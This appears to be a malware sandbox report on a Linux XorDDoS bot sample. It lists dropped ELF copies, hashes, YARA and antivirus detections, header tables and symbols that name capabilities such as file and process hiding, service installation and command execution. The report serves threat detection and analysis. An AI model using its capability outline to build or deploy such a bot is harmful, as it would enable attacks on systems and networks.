                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Category:dropped
                                                            Size (bytes):625889
                                                            Entropy (8bit):6.244438122825698
                                                            Encrypted:false
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AD:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/910
                                                            MD5:54DAE078A67E6B3E3DA231442BF638AD
                                                            SHA1:F83ADBED007B877ECD1AB8CA727F1BBD1F0CC231
                                                            SHA-256:16615C96118BBDEE29E964488A97BC41BF7CC67E25F17FA3D197716A37E53813
                                                            SHA-512:508A71EED7EC7EDABAE6A96FBD7AA998BA3B3B904FDA1DF119A42C7F8546D8D25BE1EED93FB2303BFC8244EE0E1D8370C9A4CCBD9E5226B53BC69A6241380A1A
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wyyhrifhaz, Author: Joe Security
                                                            • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wyyhrifhaz, Author: ditekSHen
                                                            • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wyyhrifhaz, Author: Akamai CSIRT
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Category:dropped
                                                            Size (bytes):625889
                                                            Entropy (8bit):6.244435671890783
                                                            Encrypted:false
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Av:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91g
                                                            MD5:799BAE277CBB415227A0100B46398B8F
                                                            SHA1:BA160FF928BF1E4F6D0AB0922C0D5AE297CBD452
                                                            SHA-256:0F7199407D09B4D2A7AACD583CE8AA2CB597F5DE3F82803D90D13D9F279F4F63
                                                            SHA-512:35A5EBE50C0F2879D1C23B9025D1B6A06611E343F683703C9F36CA3A888A3E759CBD3AE2F5CC436D398B950DC382FB60643C84C94BE59E7720AE6F6740D3212F
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/yfiimchuiz, Author: Joe Security
                                                            • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/yfiimchuiz, Author: ditekSHen
                                                            • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/yfiimchuiz, Author: Akamai CSIRT
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Category:dropped
                                                            Size (bytes):598016
                                                            Entropy (8bit):6.171512493331485
                                                            Encrypted:false
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEPP:FBXmkN/+Fhu/Qo4h9L+zNN4BVEX
                                                            MD5:ECA7B8ED853FEA8C58FDBBD03E381262
                                                            SHA1:254CE306A2FE891D8E18AF0D7265E18932F077D8
                                                            SHA-256:65915045AAE230096F97A5CCBF47A9BC16E8854FFB29150B89BE8E7C7AA5F448
                                                            SHA-512:285E50EFB4D3F9F40F02CDD2D20EB322027013C3DFE11C21361DA0FBEF232CAB35F9DB179E36AF470210A387849F3E1DB65FF268BCFCD37BEEE7412334C03CB3
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zetazkptwu, Author: Joe Security
                                                            • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/zetazkptwu, Author: ditekSHen
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Category:dropped
                                                            Size (bytes):625889
                                                            Entropy (8bit):6.244437239066855
                                                            Encrypted:false
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Ak:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91/
                                                            MD5:E6A731EAB67241EEF92D9748FD128432
                                                            SHA1:A8854E19542C2FFB9675CB6CFAB335E4F7DDF0D0
                                                            SHA-256:2F9369C8768F1F3AE2F25DFFB78D1C238075E981B3760B0DC0A1B43117FF9ABC
                                                            SHA-512:1EE31A214D177A2C8E3E84162881C99E7AE5BA15BB87F6BF4C8DAF3334C01F6FF880C56419069084643C5ABCA2BF0DD84938F1A60A00D578ABE7AF7E65FA2341
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zyapsjpaje, Author: Joe Security
                                                            • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/zyapsjpaje, Author: ditekSHen
                                                            • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/zyapsjpaje, Author: Akamai CSIRT
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                            File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Entropy (8bit):6.244401838455305
                                                            TrID:
                                                            • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                            • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                            File name:dkuidbsedp
                                                            File size:625878
                                                            MD5:37542894283b8851469753de69c0bcdc
                                                            SHA1:0480f29f346b400b989d88798b4418d5ef0fd3d9
                                                            SHA256:7c0d5161ad70acf5b98b640089d23ada44935dcd7240c64d43f7cc54d853acb1
                                                            SHA512:0ce2fcc97494eab5feec72ab21163e1ac0c6ae9182f6d366dd7e5a2bcb00c1c46276eb4504fa09b79d258113881a2ebb5fe942642f88f738b68de83d9dffe71f
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Am:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91b
                                                            TLSH:EAD47D06F243EAF7C4970570124BF7BF4230E6318412DF8AB6889D5AB9379F52A4E356
                                                            File Content Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r.......................... ... ................a..............@...........Q.td........................................GNU.................U......5...

                                                            ELF header

                                                            Class:ELF32
                                                            Data:2's complement, little endian
                                                            Version:1 (current)
                                                            Machine:Intel 80386
                                                            Version Number:0x1
                                                            Type:EXEC (Executable file)
                                                            OS/ABI:UNIX - System V
                                                            ABI Version:0
                                                            Entry Point Address:0x8048110
                                                            Flags:0x0
                                                            ELF Header Size:52
                                                            Program Header Offset:52
                                                            Program Header Size:32
                                                            Number of Program Headers:5
                                                            Section Header Offset:553480
                                                            Section Header Size:40
                                                            Number of Section Headers:28
                                                            Header String Table Index:25
                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                            NULL0x00x00x00x00x0000
                                                            .note.ABI-tagNOTE0x80480d40xd40x200x00x2A004
                                                            .initPROGBITS0x80480f40xf40x170x00x6AX004
                                                            .textPROGBITS0x80481100x1100x697d80x00x6AX0016
                                                            __libc_freeres_fnPROGBITS0x80b18f00x698f00x100f0x00x6AX0016
                                                            __libc_thread_freeres_fnPROGBITS0x80b29000x6a9000x1db0x00x6AX0016
                                                            .finiPROGBITS0x80b2adc0x6aadc0x1c0x00x6AX004
                                                            .rodataPROGBITS0x80b2b000x6ab000x153c00x00x2A0032
                                                            __libc_subfreeresPROGBITS0x80c7ec00x7fec00x300x00x2A004
                                                            __libc_atexitPROGBITS0x80c7ef00x7fef00x40x00x2A004
                                                            __libc_thread_subfreeresPROGBITS0x80c7ef40x7fef40x80x00x2A004
                                                            .eh_framePROGBITS0x80c7efc0x7fefc0x60f40x00x2A004
                                                            .gcc_except_tablePROGBITS0x80cdff00x85ff00x11b0x00x2A001
                                                            .tdataPROGBITS0x80cf10c0x8610c0x140x00x403WAT004
                                                            .tbssNOBITS0x80cf1200x861200x2c0x00x403WAT004
                                                            .ctorsPROGBITS0x80cf1200x861200x80x00x3WA004
                                                            .dtorsPROGBITS0x80cf1280x861280xc0x00x3WA004
                                                            .jcrPROGBITS0x80cf1340x861340x40x00x3WA004
                                                            .data.rel.roPROGBITS0x80cf1380x861380x2c0x00x3WA004
                                                            .gotPROGBITS0x80cf1640x861640x80x40x3WA004
                                                            .got.pltPROGBITS0x80cf16c0x8616c0xc0x40x3WA004
                                                            .dataPROGBITS0x80cf1800x861800xb400x00x3WA0032
                                                            .bssNOBITS0x80cfcc00x86cc00x67180x00x3WA0032
                                                            __libc_freeres_ptrsNOBITS0x80d63d80x86cc00x140x00x3WA004
                                                            .commentPROGBITS0x00x86cc00x4220x00x0001
                                                            .shstrtabSTRTAB0x00x870e20x1260x00x0001
                                                            .symtabSYMTAB0x00x876680x93c00x100x0279144
                                                            .strtabSTRTAB0x00x90a280x82a30x00x0001
                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                            LOAD0x00x80480000x80480000x8610b0x8610b6.19660x5R E0x1000.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
                                                            LOAD0x8610c0x80cf10c0x80cf10c0xbb40x72e03.65720x6RW 0x1000.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
                                                            NOTE0xd40x80480d40x80480d40x200x201.74870x4R 0x4.note.ABI-tag
                                                            TLS0x8610c0x80cf10c0x80cf10c0x140x402.84140x4R 0x4.tdata .tbss
                                                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                            NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                            .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                            .symtab0x80480d40SECTION<unknown>DEFAULT1
                                                            .symtab0x80480f40SECTION<unknown>DEFAULT2
                                                            .symtab0x80481100SECTION<unknown>DEFAULT3
                                                            .symtab0x80b18f00SECTION<unknown>DEFAULT4
                                                            .symtab0x80b29000SECTION<unknown>DEFAULT5
                                                            .symtab0x80b2adc0SECTION<unknown>DEFAULT6
                                                            .symtab0x80b2b000SECTION<unknown>DEFAULT7
                                                            .symtab0x80c7ec00SECTION<unknown>DEFAULT8
                                                            .symtab0x80c7ef00SECTION<unknown>DEFAULT9
                                                            .symtab0x80c7ef40SECTION<unknown>DEFAULT10
                                                            .symtab0x80c7efc0SECTION<unknown>DEFAULT11
                                                            .symtab0x80cdff00SECTION<unknown>DEFAULT12
                                                            .symtab0x80cf10c0SECTION<unknown>DEFAULT13
                                                            .symtab0x80cf1200SECTION<unknown>DEFAULT14
                                                            .symtab0x80cf1200SECTION<unknown>DEFAULT15
                                                            .symtab0x80cf1280SECTION<unknown>DEFAULT16
                                                            .symtab0x80cf1340SECTION<unknown>DEFAULT17
                                                            .symtab0x80cf1380SECTION<unknown>DEFAULT18
                                                            .symtab0x80cf1640SECTION<unknown>DEFAULT19
                                                            .symtab0x80cf16c0SECTION<unknown>DEFAULT20
                                                            .symtab0x80cf1800SECTION<unknown>DEFAULT21
                                                            .symtab0x80cfcc00SECTION<unknown>DEFAULT22
                                                            .symtab0x80d63d80SECTION<unknown>DEFAULT23
                                                            .symtab0x00SECTION<unknown>DEFAULT24
                                                            .L108.symtab0x80ad9500NOTYPE<unknown>DEFAULT3
                                                            .L113.symtab0x80ad9900NOTYPE<unknown>DEFAULT3
                                                            .L114.symtab0x80ad9f80NOTYPE<unknown>DEFAULT3
                                                            .L115.symtab0x80ada300NOTYPE<unknown>DEFAULT3
                                                            .L116.symtab0x80ada4e0NOTYPE<unknown>DEFAULT3
                                                            .L117.symtab0x80ada6c0NOTYPE<unknown>DEFAULT3
                                                            .L118.symtab0x80ada890NOTYPE<unknown>DEFAULT3
                                                            .L119.symtab0x80adabd0NOTYPE<unknown>DEFAULT3
                                                            .L12.symtab0x80b130b0NOTYPE<unknown>DEFAULT3
                                                            .L120.symtab0x80adadc0NOTYPE<unknown>DEFAULT3
                                                            .L121.symtab0x80adafb0NOTYPE<unknown>DEFAULT3
                                                            .L122.symtab0x80ad8e30NOTYPE<unknown>DEFAULT3
                                                            .L123.symtab0x80adb2b0NOTYPE<unknown>DEFAULT3
                                                            .L124.symtab0x80add7f0NOTYPE<unknown>DEFAULT3
                                                            .L125.symtab0x80addb40NOTYPE<unknown>DEFAULT3
                                                            .L126.symtab0x80add020NOTYPE<unknown>DEFAULT3
                                                            .L127.symtab0x80add1f0NOTYPE<unknown>DEFAULT3
                                                            .L128.symtab0x80add460NOTYPE<unknown>DEFAULT3
                                                            .L129.symtab0x80add630NOTYPE<unknown>DEFAULT3
                                                            .L130.symtab0x80adb8c0NOTYPE<unknown>DEFAULT3
                                                            .L131.symtab0x80adbd30NOTYPE<unknown>DEFAULT3
                                                            .L132.symtab0x80adc000NOTYPE<unknown>DEFAULT3
                                                            .L133.symtab0x80adc370NOTYPE<unknown>DEFAULT3
                                                            .L134.symtab0x80adc500NOTYPE<unknown>DEFAULT3
                                                            .L135.symtab0x80adc7d0NOTYPE<unknown>DEFAULT3
                                                            .L136.symtab0x80adcb50NOTYPE<unknown>DEFAULT3
                                                            .L137.symtab0x80adcc90NOTYPE<unknown>DEFAULT3
                                                            .L14.symtab0x80b14190NOTYPE<unknown>DEFAULT3
                                                            .L15.symtab0x80b14080NOTYPE<unknown>DEFAULT3
                                                            .L16.symtab0x80b13f80NOTYPE<unknown>DEFAULT3
                                                            .L17.symtab0x80b13e80NOTYPE<unknown>DEFAULT3
                                                            .L18.symtab0x80b138c0NOTYPE<unknown>DEFAULT3
                                                            .L19.symtab0x80b137e0NOTYPE<unknown>DEFAULT3
                                                            .L20.symtab0x80b13450NOTYPE<unknown>DEFAULT3
                                                            .L21.symtab0x80b13710NOTYPE<unknown>DEFAULT3
                                                            .L258.symtab0x80ae76c0NOTYPE<unknown>DEFAULT3
                                                            .L259.symtab0x80ae4a00NOTYPE<unknown>DEFAULT3
                                                            .L260.symtab0x80ae5f70NOTYPE<unknown>DEFAULT3
                                                            .L261.symtab0x80ae7c00NOTYPE<unknown>DEFAULT3
                                                            .L262.symtab0x80ae5e90NOTYPE<unknown>DEFAULT3
                                                            .L264.symtab0x80ae43d0NOTYPE<unknown>DEFAULT3
                                                            .L266.symtab0x80ae4960NOTYPE<unknown>DEFAULT3
                                                            .L267.symtab0x80ae68f0NOTYPE<unknown>DEFAULT3
                                                            .L268.symtab0x80ae6a00NOTYPE<unknown>DEFAULT3
                                                            .L269.symtab0x80ae6050NOTYPE<unknown>DEFAULT3
                                                            .L270.symtab0x80ae6280NOTYPE<unknown>DEFAULT3
                                                            .L271.symtab0x80ae6420NOTYPE<unknown>DEFAULT3
                                                            .L272.symtab0x80ae6640NOTYPE<unknown>DEFAULT3
                                                            .L273.symtab0x80ae4ab0NOTYPE<unknown>DEFAULT3
                                                            .L274.symtab0x80ae4e40NOTYPE<unknown>DEFAULT3
                                                            .L275.symtab0x80ae5990NOTYPE<unknown>DEFAULT3
                                                            .L276.symtab0x80ae55f0NOTYPE<unknown>DEFAULT3
                                                            .L277.symtab0x80ae5da0NOTYPE<unknown>DEFAULT3
                                                            .L278.symtab0x80ae8350NOTYPE<unknown>DEFAULT3
                                                            .L279.symtab0x80ae7ce0NOTYPE<unknown>DEFAULT3
                                                            .L280.symtab0x80ae7e00NOTYPE<unknown>DEFAULT3
                                                            .L281.symtab0x80ae6b70NOTYPE<unknown>DEFAULT3
                                                            .L282.symtab0x80ae70c0NOTYPE<unknown>DEFAULT3
                                                            .L283.symtab0x80ae4670NOTYPE<unknown>DEFAULT3
                                                            .L350.symtab0x80ae8400NOTYPE<unknown>DEFAULT3
                                                            .L351.symtab0x80ae84a0NOTYPE<unknown>DEFAULT3
                                                            .L352.symtab0x80ae8590NOTYPE<unknown>DEFAULT3
                                                            .L353.symtab0x80ae8630NOTYPE<unknown>DEFAULT3
                                                            .L354.symtab0x80ae8720NOTYPE<unknown>DEFAULT3
                                                            .L355.symtab0x80ae87d0NOTYPE<unknown>DEFAULT3
                                                            .L356.symtab0x80ae8870NOTYPE<unknown>DEFAULT3
                                                            .L357.symtab0x80ae8920NOTYPE<unknown>DEFAULT3
                                                            .L358.symtab0x80ae89e0NOTYPE<unknown>DEFAULT3
                                                            .L359.symtab0x80ae8aa0NOTYPE<unknown>DEFAULT3
                                                            .L360.symtab0x80ae8b30NOTYPE<unknown>DEFAULT3
                                                            .L361.symtab0x80ae8bd0NOTYPE<unknown>DEFAULT3
                                                            .L362.symtab0x80ae8cc0NOTYPE<unknown>DEFAULT3
                                                            .L363.symtab0x80ae8db0NOTYPE<unknown>DEFAULT3
                                                            .L364.symtab0x80ae8ea0NOTYPE<unknown>DEFAULT3
                                                            .L365.symtab0x80ae8f90NOTYPE<unknown>DEFAULT3
                                                            .L366.symtab0x80ae9080NOTYPE<unknown>DEFAULT3
                                                            .L380.symtab0x80ae4380NOTYPE<unknown>DEFAULT3
                                                            .L411.symtab0x80aeb100NOTYPE<unknown>DEFAULT3
                                                            .L412.symtab0x80aeae60NOTYPE<unknown>DEFAULT3
                                                            .L413.symtab0x80aeb540NOTYPE<unknown>DEFAULT3
                                                            .L414.symtab0x80aebc00NOTYPE<unknown>DEFAULT3
                                                            .L415.symtab0x80aec200NOTYPE<unknown>DEFAULT3
                                                            .L416.symtab0x80aec600NOTYPE<unknown>DEFAULT3
                                                            .L61.symtab0x80ad6730NOTYPE<unknown>DEFAULT3
                                                            .L63.symtab0x80ad6ef0NOTYPE<unknown>DEFAULT3
                                                            .L64.symtab0x80ad6ce0NOTYPE<unknown>DEFAULT3
                                                            .L67.symtab0x80ad6de0NOTYPE<unknown>DEFAULT3
                                                            .L68.symtab0x80ad6d60NOTYPE<unknown>DEFAULT3
                                                            .L69.symtab0x80ad6a20NOTYPE<unknown>DEFAULT3
                                                            .L70.symtab0x80ad6c20NOTYPE<unknown>DEFAULT3
                                                            .L74.symtab0x80afb630NOTYPE<unknown>DEFAULT3
                                                            .L76.symtab0x80afbdf0NOTYPE<unknown>DEFAULT3
                                                            .L77.symtab0x80afbbe0NOTYPE<unknown>DEFAULT3
                                                            .L80.symtab0x80afbce0NOTYPE<unknown>DEFAULT3
                                                            .L81.symtab0x80afbc60NOTYPE<unknown>DEFAULT3
                                                            .L82.symtab0x80afb920NOTYPE<unknown>DEFAULT3
                                                            .L83.symtab0x80afbb20NOTYPE<unknown>DEFAULT3
                                                            AddService.symtab0x8048865807FUNC<unknown>DEFAULT3
                                                            CalcCrc32.symtab0x80492b470FUNC<unknown>DEFAULT3
                                                            CalcFileCrc.symtab0x8049346172FUNC<unknown>DEFAULT3
                                                            CalcFindIpCrc.symtab0x804932038FUNC<unknown>DEFAULT3
                                                            CalcHeaderCrc.symtab0x80492fa38FUNC<unknown>DEFAULT3
                                                            CheckLKM.symtab0x804a670107FUNC<unknown>DEFAULT3
                                                            CreateDir.symtab0x80483de375FUNC<unknown>DEFAULT3
                                                            DNS_ADDR.symtab0x80cf4cc16OBJECT<unknown>DEFAULT21
                                                            DNS_ADDR2.symtab0x80cf4dc16OBJECT<unknown>DEFAULT21
                                                            DNS_PORT.symtab0x80cf4ec4OBJECT<unknown>DEFAULT21
                                                            DelService.symtab0x8048cdc275FUNC<unknown>DEFAULT3
                                                            DelService_form_pid.symtab0x8048def113FUNC<unknown>DEFAULT3
                                                            GetCpuInfo.symtab0x804e2ce539FUNC<unknown>DEFAULT3
                                                            GetIndex.symtab0x804b418189FUNC<unknown>DEFAULT3
                                                            GetLanSpeed.symtab0x804e5e1243FUNC<unknown>DEFAULT3
                                                            GetMemStat.symtab0x804e1d9245FUNC<unknown>DEFAULT3
                                                            Get_AllIP.symtab0x804ef5d375FUNC<unknown>DEFAULT3
                                                            HideFile.symtab0x804a74d151FUNC<unknown>DEFAULT3
                                                            HidePidPort.symtab0x804a6db114FUNC<unknown>DEFAULT3
                                                            InstallSYS.symtab0x8048b8c336FUNC<unknown>DEFAULT3
                                                            LinuxExec.symtab0x8048eed122FUNC<unknown>DEFAULT3
                                                            LinuxExec_Argv.symtab0x8048f67135FUNC<unknown>DEFAULT3
                                                            LinuxExec_Argv2.symtab0x8048fee148FUNC<unknown>DEFAULT3
                                                            LogFacility.symtab0x80cfa0c4OBJECT<unknown>DEFAULT21
                                                            LogFile.symtab0x80cfa084OBJECT<unknown>DEFAULT21
                                                            LogMask.symtab0x80cfa004OBJECT<unknown>DEFAULT21
                                                            LogStat.symtab0x80d50444OBJECT<unknown>DEFAULT22
                                                            LogTag.symtab0x80d50484OBJECT<unknown>DEFAULT22
                                                            LogType.symtab0x80cfa044OBJECT<unknown>DEFAULT21
                                                            MAGIC_STR.symtab0x80d1f6033OBJECT<unknown>DEFAULT22
                                                            MainList.symtab0x80d1fa0264OBJECT<unknown>DEFAULT22
                                                            ReadWord.symtab0x804e150137FUNC<unknown>DEFAULT3
                                                            SIZE_DNS_H.symtab0x80cf4a44OBJECT<unknown>DEFAULT21
                                                            SIZE_DNS_T.symtab0x80cf4a84OBJECT<unknown>DEFAULT21
                                                            SIZE_IP_H.symtab0x80cf4984OBJECT<unknown>DEFAULT21
                                                            SIZE_PSEUDO_HDR.symtab0x80cf4ac4OBJECT<unknown>DEFAULT21
                                                            SIZE_TCP_H.symtab0x80cf4a04OBJECT<unknown>DEFAULT21
                                                            SIZE_UDP_H.symtab0x80cf49c4OBJECT<unknown>DEFAULT21
                                                            SYS_BUF.symtab0x80cfce01OBJECT<unknown>DEFAULT22
                                                            SyslogAddr.symtab0x80d5060110OBJECT<unknown>DEFAULT22
                                                            THREAD_NUM.symtab0x80d61704OBJECT<unknown>DEFAULT22
                                                            _Exit.symtab0x8067a2819FUNC<unknown>DEFAULT3
                                                            _GLOBAL_OFFSET_TABLE_.symtab0x80cf16c0OBJECT<unknown>HIDDEN20
                                                            _IO_2_1_stderr_.symtab0x80cf700152OBJECT<unknown>DEFAULT21
                                                            _IO_2_1_stdin_.symtab0x80cf5c0152OBJECT<unknown>DEFAULT21
                                                            _IO_2_1_stdout_.symtab0x80cf660152OBJECT<unknown>DEFAULT21
                                                            _IO_adjust_column.symtab0x805c9b060FUNC<unknown>DEFAULT3
                                                            _IO_adjust_wcolumn.symtab0x808477063FUNC<unknown>DEFAULT3
                                                            _IO_cleanup.symtab0x805d310409FUNC<unknown>DEFAULT3
                                                            _IO_default_doallocate.symtab0x805de10143FUNC<unknown>DEFAULT3
                                                            _IO_default_finish.symtab0x805e310525FUNC<unknown>DEFAULT3
                                                            _IO_default_imbue.symtab0x805cac05FUNC<unknown>DEFAULT3
                                                            _IO_default_pbackfail.symtab0x805d900310FUNC<unknown>DEFAULT3
                                                            _IO_default_read.symtab0x805ca9010FUNC<unknown>DEFAULT3
                                                            _IO_default_seek.symtab0x805ca7015FUNC<unknown>DEFAULT3
                                                            _IO_default_seekoff.symtab0x805c90015FUNC<unknown>DEFAULT3
                                                            _IO_default_seekpos.symtab0x805c81059FUNC<unknown>DEFAULT3
                                                            _IO_default_setbuf.symtab0x805dd10244FUNC<unknown>DEFAULT3
                                                            _IO_default_showmanyc.symtab0x805cab010FUNC<unknown>DEFAULT3
                                                            _IO_default_stat.symtab0x805ca8010FUNC<unknown>DEFAULT3
                                                            _IO_default_sync.symtab0x805c8f07FUNC<unknown>DEFAULT3
                                                            _IO_default_uflow.symtab0x805c7b052FUNC<unknown>DEFAULT3
                                                            _IO_default_underflow.symtab0x805c7a010FUNC<unknown>DEFAULT3
                                                            _IO_default_write.symtab0x805caa07FUNC<unknown>DEFAULT3
                                                            _IO_default_xsgetn.symtab0x805e250185FUNC<unknown>DEFAULT3
                                                            _IO_default_xsputn.symtab0x805cc80225FUNC<unknown>DEFAULT3
                                                            _IO_do_write.symtab0x805bd80271FUNC<unknown>DEFAULT3
                                                            _IO_doallocbuf.symtab0x805dc80133FUNC<unknown>DEFAULT3
                                                            _IO_fclose.symtab0x8057df0439FUNC<unknown>DEFAULT3
                                                            _IO_feof.symtab0x80596d0154FUNC<unknown>DEFAULT3
                                                            _IO_fgets.symtab0x8057ff0360FUNC<unknown>DEFAULT3
                                                            _IO_file_attach.symtab0x8059dc0133FUNC<unknown>DEFAULT3
                                                            _IO_file_close.symtab0x805a94018FUNC<unknown>DEFAULT3
                                                            _IO_file_close_it.symtab0x805b2f0581FUNC<unknown>DEFAULT3
                                                            _IO_file_close_mmap.symtab0x805a96060FUNC<unknown>DEFAULT3
                                                            _IO_file_doallocate.symtab0x80839b0275FUNC<unknown>DEFAULT3
                                                            _IO_file_finish.symtab0x805c4a0327FUNC<unknown>DEFAULT3
                                                            _IO_file_fopen.symtab0x805b5401388FUNC<unknown>DEFAULT3
                                                            _IO_file_init.symtab0x805b04051FUNC<unknown>DEFAULT3
                                                            _IO_file_jumps.symtab0x80b3e0084OBJECT<unknown>DEFAULT7
                                                            _IO_file_jumps_maybe_mmap.symtab0x80b3ec084OBJECT<unknown>DEFAULT7
                                                            _IO_file_jumps_mmap.symtab0x80b3e6084OBJECT<unknown>DEFAULT7
                                                            _IO_file_open.symtab0x805af30263FUNC<unknown>DEFAULT3
                                                            _IO_file_overflow.symtab0x805c0301131FUNC<unknown>DEFAULT3
                                                            _IO_file_read.symtab0x805a9d048FUNC<unknown>DEFAULT3
                                                            _IO_file_seek.symtab0x8059fd018FUNC<unknown>DEFAULT3
                                                            _IO_file_seekoff.symtab0x805aa001245FUNC<unknown>DEFAULT3
